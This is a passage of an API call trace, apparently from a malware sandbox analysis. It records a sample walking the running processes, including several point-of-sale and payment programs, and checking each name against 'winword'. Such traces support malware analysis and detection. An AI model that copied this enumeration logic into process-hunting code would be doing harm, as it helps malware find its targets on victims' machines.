lpMultiByteStr=0x356dcb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0100.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0100.484] StrStrIA (lpFirst="winscp.exe", lpSrch="winword") returned 0x0 [0100.484] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.485] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d308 [0100.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357d308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0100.485] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0100.485] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="winword") returned 0x0 [0100.485] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.486] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d488 [0100.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357d488, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0100.486] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0100.486] StrStrIA (lpFirst="active-charge.exe", lpSrch="winword") returned 0x0 [0100.486] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.488] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dc08 [0100.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356dc08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.488] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0100.488] StrStrIA (lpFirst="accupos.exe", lpSrch="winword") returned 0x0 [0100.488] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.489] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356db18 [0100.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356db18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0100.489] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0100.489] StrStrIA (lpFirst="afr38.exe", lpSrch="winword") returned 0x0 [0100.489] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.490] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dd88 [0100.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356dd88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0100.490] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0100.490] StrStrIA (lpFirst="aldelo.exe", lpSrch="winword") returned 0x0 [0100.491] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.492] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356dba8 [0100.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356dba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0100.492] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0100.492] StrStrIA (lpFirst="ccv_server.exe", lpSrch="winword") returned 0x0 [0100.492] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.493] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357d348 [0100.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357d348, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0100.493] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0100.493] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="winword") returned 0x0 [0100.493] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.494] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d0a8 [0100.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357d0a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0100.494] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0100.495] StrStrIA (lpFirst="creditservice.exe", lpSrch="winword") returned 0x0 [0100.495] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.496] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dd40 [0100.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356dd40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0100.496] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0100.496] StrStrIA (lpFirst="edcsvr.exe", lpSrch="winword") returned 0x0 [0100.496] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.497] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356dd58 [0100.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356dd58, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0100.497] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0100.497] StrStrIA (lpFirst="fpos.exe", lpSrch="winword") returned 0x0 [0100.497] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.498] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356db48 [0100.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356db48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0100.499] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0100.499] StrStrIA (lpFirst="isspos.exe", lpSrch="winword") returned 0x0 [0100.499] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.500] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d0c8 [0100.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357d0c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0100.500] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0100.500] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="winword") returned 0x0 [0100.500] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.501] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dab8 [0100.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356dab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.501] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0100.501] StrStrIA (lpFirst="omnipos.exe", lpSrch="winword") returned 0x0 [0100.501] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.504] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dc20 [0100.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x356dc20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.504] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0100.504] StrStrIA (lpFirst="spcwin.exe", lpSrch="winword") returned 0x0 [0100.504] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.506] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357d428 [0100.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357d428, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0100.506] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0100.506] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="winword") returned 0x0 [0100.506] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.507] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356dad0 [0100.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356dad0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0100.507] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0100.507] StrStrIA (lpFirst="utg2.exe", lpSrch="winword") returned 0x0 [0100.507] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0100.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.509] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dae8 [0100.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356dae8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0100.509] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0100.509] StrStrIA (lpFirst="saying.exe", lpSrch="winword") returned 0x0 [0100.509] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0100.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.510] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356db78 [0100.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356db78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0100.510] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0100.510] StrStrIA (lpFirst="ripe.exe", lpSrch="winword") returned 0x0 [0100.510] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0100.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.511] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356db30 [0100.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356db30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0100.512] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0100.512] StrStrIA (lpFirst="acoustic.exe", lpSrch="winword") returned 0x0 [0100.512] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0100.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.513] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356dbc0 [0100.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356dbc0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0100.513] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0100.513] StrStrIA (lpFirst="mail.exe", lpSrch="winword") returned 0x0 [0100.513] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.514] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356dbd8 [0100.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356dbd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.514] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.514] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="winword") returned 0x0 [0100.514] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.516] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dc38 [0100.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356dc38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.516] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.516] StrStrIA (lpFirst="svchost.exe", lpSrch="winword") returned 0x0 [0100.516] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0100.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.517] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dc50 [0100.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356dc50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", 